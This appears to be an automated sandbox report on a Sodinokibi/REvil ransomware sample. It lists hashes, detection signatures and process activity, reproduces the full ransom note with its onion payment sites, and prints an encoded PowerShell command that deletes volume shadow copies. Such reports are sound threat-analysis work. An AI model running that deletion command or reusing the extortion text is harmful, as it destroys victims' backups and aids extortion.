Analysis

  • max time kernel
    107s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:55

General

  • Target

    d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe

  • Size

    114KB

  • MD5

    7aa014e2800e080f3d14737599d21cf9

  • SHA1

    62ae49505dad5b24f8fbc8b78fd73da18c55a068

  • SHA256

    d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be

  • SHA512

    b71067909b78c018d17ef39ca21247cbc901e2635bb2394164ae9d97e35bf25021f922f3c2fa0e951f50c601ba136982f048640c76ea57d861e7d7c4f96a61f3

Score
10/10

Malware Config

Extracted

Path

C:\11f12v-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 11f12v. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS[+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/56?s=f2adf69100849cbb12ac102ec7c6cb81 (USE TOR) [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/601C74182C3405CC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/601C74182C3405CC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 8dr5q71sdv7H0xaLESsnf90SGqeq35I/m7EvyuY/hlZeagrgWEzPCoRcR0sTEomX 2Z0N87P8PEAJchZJo95cZ1dwvHR8FoqNp4kj+goRKwkFdUXRp7Ukqt42Dy9AZUMW JawGsfWrMzZjU+IYwmof2E0dT4nQz7EeFuod7zBZb6dFqlNc0NlFTFVgEcyZRS5t gxU3a/5l2O+ccVOab9Kwppg+ZDh3D4Ina5t5Imf4GiB9SaEhlgq2ERIfspbdeApk u46RGLuvBVy5SxgYtbbqdShvaeeOYB8lc9iEEsqr0+EXmr9i+ispn8JRG6/zf45c p9OmLyTtDT+6rJgYEmSaSaerv0DMkyXFzH8ynDcxmNuyAHz4E32mEdoDZa+lMZnn pQ/BqdovhhS2eB3Bdy8d/4lcnb110H0gUCfz7hyX7Bg3Otl9tZUWnrN2uScUFXUv cQh5dwHzRt/ZblWxnLNrpraUL8f4e14P6uLdAHGhjcQP8mQgApjOd6fuUZZVrKqB QpGHpt0FlW6CPoEJaf3irenDU8I6pNiz+QQ3NGuTyxNU81iE33stWcZke8vYg6Vl aNzUL8PwuNV8YMYxVlVvvKcYV0hWOfgOZGRl6FfZoxTTxDPluCksPFiblRjXMgYn fCHKJCUW303YAyvA7CDCAikGAJlDRWoBcNHBKTsX3Vk54FPJXTb9bnYEF2aGkI0I yxKCjStJsy1BbgICUSchgyqh9X09jPSuMgTI4rq1W/63kUMPd+zMpldUr1CpiHoX DII6IaG4X6klTBdFjkyg46oK8R7yBjhdLI6CXU6h+KCqtrcbZfqEQgiKVSIePDzc 9kdrflwZ6W5DCbSG0NVJADF0vPpDUlLc3UuuLHdE0P5Q6dHDkDUzMPD/SSoM96IR mvHVd+RYnkoYeyQKFu2L0dBKeur+zbJ5eJaXwy3A5aCckjqhXdX3TTVQc4/avXAp SEea8lWKo8iuk92YD3LYkvjYDzXSde5Xq+Cqv+97w8y1TyTsvqiMrQIWrjFtPm21 VUmBfAsO/BTUxVha6ukQjZETiJywrbnlc/J+x33klR52D19uzqrBoC0Xd9JqDo+1 ROrwCNiR/l8OCgVd2jAScElwCLh2AZnI6o2RYbj3O9bLk1KmII/gBXkoDjPiwbpR 8Nnc7Q4zdpqPQdjdpFVo8u6bajNpn4xRLtdnU4P8O0HjYU85TuAAvULTzushGTeC nxAgRgQpnLlFnXBP8UW9yt2KDFQrdc0D1UDZRoC4hQHAAOF/PIvMu2D4sCpzdb2T eB3v+bzfemGveYPqBPdqlQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/601C74182C3405CC

http://decryptor.cc/601C74182C3405CC

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe
    "C:\Users\Admin\AppData\Local\Temp\d9d6363529c399104f3afddf682c7437fbf5bddb33c778a67c1f0b6ff92fa0be.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4432
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4108
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:532

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4432-123-0x00000233B7980000-0x00000233B79A2000-memory.dmp
      Filesize

      136KB

    • memory/4432-127-0x00000233B9B50000-0x00000233B9BC6000-memory.dmp
      Filesize

      472KB

    • memory/4432-134-0x00000233B7A70000-0x00000233B7A72000-memory.dmp
      Filesize

      8KB

    • memory/4432-135-0x00000233B7A73000-0x00000233B7A75000-memory.dmp
      Filesize

      8KB

    • memory/4432-141-0x00000233B7A76000-0x00000233B7A78000-memory.dmp
      Filesize

      8KB